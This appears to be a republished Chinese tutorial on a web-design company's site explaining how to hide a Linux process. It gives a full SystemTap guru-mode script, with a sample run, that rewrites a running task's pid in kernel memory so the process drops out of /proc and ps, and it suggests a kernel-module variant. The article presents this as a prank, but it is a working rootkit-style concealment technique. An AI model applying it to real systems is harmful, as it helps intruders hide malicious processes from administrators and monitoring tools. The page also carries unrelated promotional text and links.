怎么隱藏Linux進(jìn)程
小編給大家分享一下怎么隱藏Linux進(jìn)程,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
創(chuàng)新互聯(lián)為客戶(hù)提供專(zhuān)業(yè)的成都網(wǎng)站建設(shè)、網(wǎng)站制作、程序、域名、空間一條龍服務(wù),提供基于WEB的系統(tǒng)開(kāi)發(fā). 服務(wù)項(xiàng)目涵蓋了網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站程序開(kāi)發(fā)、WEB系統(tǒng)開(kāi)發(fā)、微信二次開(kāi)發(fā)、成都手機(jī)網(wǎng)站制作等網(wǎng)站方面業(yè)務(wù)。
總有朋友問(wèn)隱藏Linux進(jìn)程的方法,我說(shuō)你想隱藏到什么程度,是大隱于內(nèi)核,還是小隱于用戶(hù)。網(wǎng)上通篇論述的無(wú)外乎 hook 掉 procfs 或者類(lèi)似的用戶(hù)態(tài)方案,也都難免長(zhǎng)篇大論,我說(shuō),這些場(chǎng)面都太大了,太復(fù)雜了。對(duì)于希望馬上看到效果的而言,看到這么一堆復(fù)雜的東西,大概率望而卻步。
將Linux進(jìn)程小隱于用戶(hù)的非常規(guī)方法,僅僅一行代碼:
修改掉進(jìn)程的pid即可。
注意是小隱,所以,不值得反制,逗一下高級(jí)會(huì)議工程師搞個(gè)惡作劇玩玩得了。
target->pid = 0x7fffffff;
完整的腳本如下:
#!/usr/bin/stap -g # hide.stp global pid; function hide(who:long) %{ struct task_struct *target; target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID); target->pid = 0x7fffffff; %} probe begin { pid = $1 hide(pid); exit(); } ff;來(lái)來(lái)來(lái),試一下:
[root@localhost system]# ./tohide & [1] 403 [root@localhost system]# ./hide.stp [root@localhost system]#
用下面的命令可以檢測(cè)所有可顯示進(jìn)程的二進(jìn)制文件:
for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do ls -l /proc/$pid/exe; doneprocfs里沒(méi)了,ps當(dāng)然就檢測(cè)不到了。
如果你覺(jué)得guru 模式的 stap 怪怪的,那么你完全可以編寫(xiě)自己獨(dú)立的 Linux kernel module,采用修改完即退的方法:
target->pid = xxxx;
return -1;是不是比各種hook法簡(jiǎn)單多了,所謂的動(dòng)數(shù)據(jù)而不要?jiǎng)哟a!是不是比各種 hook 法簡(jiǎn)單多了,所謂的動(dòng)數(shù)據(jù)而不要?jiǎng)哟a!
簡(jiǎn)單的說(shuō)一下原理:
task被創(chuàng)建的時(shí)候,根據(jù)其pid注冊(cè)procfs目錄結(jié)構(gòu)。
展示procfs目錄結(jié)構(gòu)的時(shí)候,遍歷task list以其pid作為key來(lái)查找procfs目錄結(jié)構(gòu)。
0x7fffffff(或者任何其它合理的值)根本沒(méi)有注冊(cè)過(guò),當(dāng)然無(wú)法顯示。
以上是“怎么隱藏Linux進(jìn)程”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
分享題目:怎么隱藏Linux進(jìn)程
URL鏈接:http://www.chinadenli.net/article12/ieoddc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供標(biāo)簽優(yōu)化、定制開(kāi)發(fā)、商城網(wǎng)站、虛擬主機(jī)、網(wǎng)站收錄、品牌網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
- 品牌網(wǎng)站制作與普通網(wǎng)站制作的區(qū)別 2021-09-02
- 中小企業(yè)品牌網(wǎng)站制作與塑造 2021-12-06
- 什么是品牌網(wǎng)站,品牌網(wǎng)站制作需要注意哪些內(nèi)容? 2016-10-15
- 品牌網(wǎng)站制作想要滿(mǎn)意 必須要懂得的三點(diǎn)溝通技巧 2015-08-24
- 為什么高端品牌網(wǎng)站制作公司越來(lái)越少了 2016-11-12
- 如何打響品牌網(wǎng)站制作的知名度 2021-12-11
- 企業(yè)官方品牌網(wǎng)站制作需要遵循的三大原則 2023-03-02
- 如何做好品牌網(wǎng)站制作 2021-11-16
- 品牌網(wǎng)站制作好方法好步驟有哪些? 2022-06-27
- 廣州品牌網(wǎng)站制作有什么特點(diǎn)? 2022-12-20
- 湛江品牌網(wǎng)站制作:做好品牌網(wǎng)站制作方案有哪些要點(diǎn)? 2021-12-23
- 周口品牌網(wǎng)站建設(shè):在品牌網(wǎng)站制作的過(guò)程中有哪些值得注意的問(wèn)題? 2021-09-10